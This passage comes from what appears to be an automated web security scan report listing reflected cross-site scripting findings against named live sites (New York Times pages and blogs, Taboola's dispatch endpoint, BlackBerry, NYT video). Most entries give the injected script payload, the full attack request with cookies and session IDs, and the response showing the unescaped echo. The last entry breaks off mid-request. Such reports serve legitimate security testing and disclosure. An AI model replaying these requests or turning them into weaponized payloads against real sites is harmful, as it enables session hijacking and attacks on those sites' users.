This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/13/theater/reviews/13notes.html?9dfee"><script>alert(1)</script>5d27ced1f19=1 HTTP/1.1
Host: theater.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:38:33 GMT
Content-type: text/html
Content-Length: 75056

...[SNIP]...
<a href="http://theater.nytimes.com/2010/11/13/theater/reviews/13notes.html?9dfee"><script>alert(1)</script>5d27ced1f19=1&pagewanted=print">
...[SNIP]...

3.281. http://theater.nytimes.com/2010/11/13/theater/reviews/13notes.html [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://theater.nytimes.com
Path:	/2010/11/13/theater/reviews/13notes.html

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97588"><script>alert(1)</script>2ae94431781 was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/13/theater/reviews/13notes.html?src=twr97588"><script>alert(1)</script>2ae94431781 HTTP/1.1
Host: theater.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:38:44 GMT
Content-type: text/html
Content-Length: 71369

...[SNIP]...
<a href="http://theater.nytimes.com/2010/11/13/theater/reviews/13notes.html?src=twr97588"><script>alert(1)</script>2ae94431781&pagewanted=print">
...[SNIP]...

3.282. http://thecaucus.blogs.nytimes.com/2010/11/12/gov-perry-to-lead-republican-governors/ [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://thecaucus.blogs.nytimes.com
Path:	/2010/11/12/gov-perry-to-lead-republican-governors/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 980a3"><script>alert(1)</script>8eae5e2efea was submitted in the src parameter. This input was echoed as 980a3\"><script>alert(1)</script>8eae5e2efea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/gov-perry-to-lead-republican-governors/?src=twr980a3"><script>alert(1)</script>8eae5e2efea HTTP/1.1
Host: thecaucus.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:38:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://thecaucus.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 79479

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
MNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=Election+Update;Politics;Washington;Barack+Obama;Congress;Midterms;republican-governors-association;rick-perry;texas;the_caucus&src=twr980a3\"><script>alert(1)</script>8eae5e2efea">
...[SNIP]...

3.283. http://thequad.blogs.nytimes.com/2010/11/12/quad-qa-sienas-ryan-rossiter/ [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://thequad.blogs.nytimes.com
Path:	/2010/11/12/quad-qa-sienas-ryan-rossiter/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5691"><script>alert(1)</script>08b3c1d1199 was submitted in the src parameter. This input was echoed as d5691\"><script>alert(1)</script>08b3c1d1199 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/quad-qa-sienas-ryan-rossiter/?src=twrd5691"><script>alert(1)</script>08b3c1d1199 HTTP/1.1
Host: thequad.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:39:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://thequad.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
eature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=college+footbal;college+basketball;NCAA+tournament;Bowl+Championship+Series;sports;football;basketball;college;basketball;ryan-rossiter;siena&src=twrd5691\"><script>alert(1)</script>08b3c1d1199">
...[SNIP]...

3.284. http://thequad.blogs.nytimes.com/2010/11/12/weekly-pick-em-crunch-time-in-the-sec/ [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://thequad.blogs.nytimes.com
Path:	/2010/11/12/weekly-pick-em-crunch-time-in-the-sec/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8dc77"><script>alert(1)</script>ce27dbd6175 was submitted in the src parameter. This input was echoed as 8dc77\"><script>alert(1)</script>ce27dbd6175 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/weekly-pick-em-crunch-time-in-the-sec/?src=twr8dc77"><script>alert(1)</script>ce27dbd6175 HTTP/1.1
Host: thequad.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:39:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://thequad.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
ketball;NCAA+tournament;Bowl+Championship+Series;sports;football;basketball;college;alabama;clemson;florida;florida-state;kansas-state;mississippi-state;missouri;rutgers;south-carolina;syracuse&src=twr8dc77\"><script>alert(1)</script>ce27dbd6175">
...[SNIP]...

3.285. http://tmagazine.blogs.nytimes.com/2010/11/12/look-of-the-moment-v-b-s-tangerine-dream/ [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tmagazine.blogs.nytimes.com
Path:	/2010/11/12/look-of-the-moment-v-b-s-tangerine-dream/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db33e"><script>alert(1)</script>7bc29736afe was submitted in the src parameter. This input was echoed as db33e\"><script>alert(1)</script>7bc29736afe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/look-of-the-moment-v-b-s-tangerine-dream/?src=twrdb33e"><script>alert(1)</script>7bc29736afe HTTP/1.1
Host: tmagazine.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:39:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://tmagazine.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 36551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
on;first+class;gossip;hotel;jetset;luxury;menswear;models;New+York+Times;restaurant;runway;shopping;style;T+Magazine;travel;womens+wear;chanel;look-of-the-moment;victoria-beckham;womens-fashion&src=twrdb33e\"><script>alert(1)</script>7bc29736afe">
...[SNIP]...

3.286. http://topics.blogs.nytimes.com/tag/after-deadline/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.blogs.nytimes.com
Path:	/tag/after-deadline/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 538c1"><script>alert(1)</script>33f2657a714 was submitted in the REST URL parameter 2. This input was echoed as 538c1\"><script>alert(1)</script>33f2657a714 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/after-deadline538c1"><script>alert(1)</script>33f2657a714/ HTTP/1.1
Host: topics.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:40:22 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://topics.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:40:22 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/topics/tag/after-deadline538c1\"><script>alert(1)</script>33f2657a714&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.287. http://topics.blogs.nytimes.com/tag/bees/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.blogs.nytimes.com
Path:	/tag/bees/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f7d9"><script>alert(1)</script>139d110fd84 was submitted in the REST URL parameter 2. This input was echoed as 3f7d9\"><script>alert(1)</script>139d110fd84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/bees3f7d9"><script>alert(1)</script>139d110fd84/ HTTP/1.1
Host: topics.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:40:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://topics.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:40:19 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/topics/tag/bees3f7d9\"><script>alert(1)</script>139d110fd84&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.288. http://topics.blogs.nytimes.com/tag/coffee/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.blogs.nytimes.com
Path:	/tag/coffee/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5aade"><script>alert(1)</script>ce75b991a24 was submitted in the REST URL parameter 2. This input was echoed as 5aade\"><script>alert(1)</script>ce75b991a24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/coffee5aade"><script>alert(1)</script>ce75b991a24/ HTTP/1.1
Host: topics.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:40:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://topics.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:40:17 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/topics/tag/coffee5aade\"><script>alert(1)</script>ce75b991a24&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.289. http://topics.blogs.nytimes.com/tag/composting/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://topics.blogs.nytimes.com
Path:	/tag/composting/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19572"><script>alert(1)</script>1061098e34e was submitted in the REST URL parameter 2. This input was echoed as 19572\"><script>alert(1)</script>1061098e34e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/composting19572"><script>alert(1)</script>1061098e34e/ HTTP/1.1
Host: topics.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:40:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://topics.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:40:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/topics/tag/composting19572\"><script>alert(1)</script>1061098e34e&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.290. http://trc.taboolasyndication.com/dispatch [item-type parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://trc.taboolasyndication.com
Path:	/dispatch

Issue detail

The value of the item-type request parameter is copied into the HTML document as plain text between tags. The payload 1f2ba<script>alert(1)</script>e093212c051 was submitted in the item-type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /dispatch?publisher=nytimes&item-id=1248069317962&item-type=video1f2ba<script>alert(1)</script>e093212c051&pv=2&list-size=0&list-id=rplayer-during&origin=null&embed=0&external=http%3A//www.nytimes.com/&item-url=http%3A//video.nytimes.com/%3Fsrc%3Dhp1-0-V&uim=rplayer-during&uiv=default&page-id=80ab38ba1e8e581f72cae91ce7ff0cd936b19079&cv=4-4-3-41205-615264&fpv=WIN%2010%2C1%2C102%2C64&uid=a90e6082-a924-455c-a0f4-77ae13a81d64&sd=v1_637e7811ab7fa197989ae1a9b598edbc_a90e6082-a924-455c-a0f4-77ae13a81d64_1289612703_1289612703 HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://admin.brightcove.com/[[IMPORT]]/cdn.taboolasyndication.com/libtrc/nytimes/brightcove.swf
x-flash-version: 10,1,102,64
Content-Type: text/xml
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: trc.taboolasyndication.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: taboola_user_id=a90e6082-a924-455c-a0f4-77ae13a81d64; taboola_session_id_nytimes=v1_637e7811ab7fa197989ae1a9b598edbc_a90e6082-a924-455c-a0f4-77ae13a81d64_1289612703_1289612703; JSESSIONID=.prod2-f3; taboola_wv_nytimes=5137589206294179436; taboola_rii_nytimes=8016263378632544135_4537852984848739616
Content-Length: 23

taboola-recommendations

Response

HTTP/1.1 500 No enum const class com.taboola.model.general.RecommendableItem$ItemType.video1f2ba<script>alert(1)</script>e093212c051
Date: Sat, 13 Nov 2010 03:19:03 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: taboola_user_id=a90e6082-a924-455c-a0f4-77ae13a81d64;Path=/;Expires=Sun, 13-Nov-11 03:19:03 GMT
Set-Cookie: taboola_session_id_nytimes=v1_583b3362a472a2627d6a30c1783790d3_a90e6082-a924-455c-a0f4-77ae13a81d64_1289618343_1289618343;Path=/
Vary: Accept-Encoding
Connection: close
Content-Length: 4176

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 500 No enum const class com.taboola.model.general.RecommendableItem$ItemType.video1f2ba<script&g
...[SNIP]...
<pre>java.lang.IllegalArgumentException: No enum const class com.taboola.model.general.RecommendableItem$ItemType.video1f2ba<script>alert(1)</script>e093212c051
   at java.lang.Enum.valueOf(Enum.java:196)
   at com.taboola.model.general.RecommendableItem$ItemType.valueOf(RecommendableItem.java:69)
   at com.taboola.trc.data.TextRelatedContentDataSource.getItemType(
...[SNIP]...

3.291. http://trc.taboolasyndication.com/dispatch [list-id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://trc.taboolasyndication.com
Path:	/dispatch

Issue detail

The value of the list-id request parameter is copied into the HTML document as plain text between tags. The payload 6a9b2<script>alert(1)</script>6a5c31bb245 was submitted in the list-id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /dispatch?publisher=nytimes&item-id=1248069317962&item-type=video&pv=2&list-size=0&list-id=rplayer-during6a9b2<script>alert(1)</script>6a5c31bb245&origin=null&embed=0&external=http%3A//www.nytimes.com/&item-url=http%3A//video.nytimes.com/%3Fsrc%3Dhp1-0-V&uim=rplayer-during&uiv=default&page-id=80ab38ba1e8e581f72cae91ce7ff0cd936b19079&cv=4-4-3-41205-615264&fpv=WIN%2010%2C1%2C102%2C64&uid=a90e6082-a924-455c-a0f4-77ae13a81d64&sd=v1_637e7811ab7fa197989ae1a9b598edbc_a90e6082-a924-455c-a0f4-77ae13a81d64_1289612703_1289612703 HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://admin.brightcove.com/[[IMPORT]]/cdn.taboolasyndication.com/libtrc/nytimes/brightcove.swf
x-flash-version: 10,1,102,64
Content-Type: text/xml
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: trc.taboolasyndication.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: taboola_user_id=a90e6082-a924-455c-a0f4-77ae13a81d64; taboola_session_id_nytimes=v1_637e7811ab7fa197989ae1a9b598edbc_a90e6082-a924-455c-a0f4-77ae13a81d64_1289612703_1289612703; JSESSIONID=.prod2-f3; taboola_wv_nytimes=5137589206294179436; taboola_rii_nytimes=8016263378632544135_4537852984848739616
Content-Length: 23

taboola-recommendations

Response

HTTP/1.1 500 unsupported request id: rplayer-during6a9b2<script>alert(1)</script>6a5c31bb245, for publisher: PublisherVariant:nytimes(default)
Date: Sat, 13 Nov 2010 03:19:24 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: taboola_user_id=a90e6082-a924-455c-a0f4-77ae13a81d64;Path=/;Expires=Sun, 13-Nov-11 03:19:24 GMT
Set-Cookie: taboola_session_id_nytimes=v1_5f9fb141c896026bdb2479f9cb355c72_a90e6082-a924-455c-a0f4-77ae13a81d64_1289618364_1289618364;Path=/
Set-Cookie: taboola_wv_nytimes=5137589206294179436;Path=/;Expires=Sun, 13-Nov-11 03:19:24 GMT
Vary: Accept-Encoding
Connection: close
Content-Length: 4092

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 500 unsupported request id: rplayer-during6a9b2<script>alert(1)</script>6a5c31bb245, fo
...[SNIP]...
<pre>com.taboola.trc.vhf.exceptions.VHFConfigurationException: unsupported request id: rplayer-during6a9b2<script>alert(1)</script>6a5c31bb245, for publisher: PublisherVariant:nytimes(default)
at com.taboola.trc.vhf.viewsHandler.GeneralViewsProducer.handleViewRequest(GeneralViewsProducer.java:336)
at com.taboola.trc.vhf.viewsHandler.Publis
...[SNIP]...

3.292. http://trc.taboolasyndication.com/dispatch [publisher parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://trc.taboolasyndication.com
Path:	/dispatch

Issue detail

The value of the publisher request parameter is copied into the HTML document as plain text between tags. The payload 9c7e4<script>alert(1)</script>87753534a2b was submitted in the publisher parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /dispatch?publisher=nytimes9c7e4<script>alert(1)</script>87753534a2b&item-id=1248069317962&item-type=video&pv=2&list-size=0&list-id=rplayer-during&origin=null&embed=0&external=http%3A//www.nytimes.com/&item-url=http%3A//video.nytimes.com/%3Fsrc%3Dhp1-0-V&uim=rplayer-during&uiv=default&page-id=80ab38ba1e8e581f72cae91ce7ff0cd936b19079&cv=4-4-3-41205-615264&fpv=WIN%2010%2C1%2C102%2C64&uid=a90e6082-a924-455c-a0f4-77ae13a81d64&sd=v1_637e7811ab7fa197989ae1a9b598edbc_a90e6082-a924-455c-a0f4-77ae13a81d64_1289612703_1289612703 HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://admin.brightcove.com/[[IMPORT]]/cdn.taboolasyndication.com/libtrc/nytimes/brightcove.swf
x-flash-version: 10,1,102,64
Content-Type: text/xml
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: trc.taboolasyndication.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: taboola_user_id=a90e6082-a924-455c-a0f4-77ae13a81d64; taboola_session_id_nytimes=v1_637e7811ab7fa197989ae1a9b598edbc_a90e6082-a924-455c-a0f4-77ae13a81d64_1289612703_1289612703; JSESSIONID=.prod2-f3; taboola_wv_nytimes=5137589206294179436; taboola_rii_nytimes=8016263378632544135_4537852984848739616
Content-Length: 23

taboola-recommendations

Response

HTTP/1.1 500 Invalid publisher name in recommendation request: nytimes9c7e4<script>alert(1)</script>87753534a2b
Date: Sat, 13 Nov 2010 03:18:40 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Connection: close
Content-Length: 3332

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 500 Invalid publisher name in recommendation request: nytimes9c7e4<script>alert(1)</script
...[SNIP]...
<pre>com.taboola.trc.vhf.exceptions.VHFConfigurationException: Invalid publisher name in recommendation request: nytimes9c7e4<script>alert(1)</script>87753534a2b
at com.taboola.trc.vhf.adaptor.RecommendationClientAdaptor.dispatchPrehandling(RecommendationClientAdaptor.java:716)
at com.taboola.trc.vhf.adaptor.RecommendationClientAdaptor.httpClientRequest(Reco
...[SNIP]...

3.293. http://us.blackberry.com/smartphones/blackberrytorch.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://us.blackberry.com
Path:	/smartphones/blackberrytorch.jsp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98692"><script>alert(1)</script>768e34e7928 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /smartphones/98692"><script>alert(1)</script>768e34e7928 HTTP/1.1
Host: us.blackberry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 13 Nov 2010 03:18:34 GMT
Date: Sat, 13 Nov 2010 03:18:34 GMT
Content-Length: 21670
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/smartphones/98692"><script>alert(1)</script>768e34e7928/" />
...[SNIP]...

3.294. http://video.nytimes.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38b95"><script>alert(1)</script>9c567e08122 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?src=hp1-0-V&38b95"><script>alert(1)</script>9c567e08122=1 HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: video.nytimes.com
Proxy-Connection: Keep-Alive
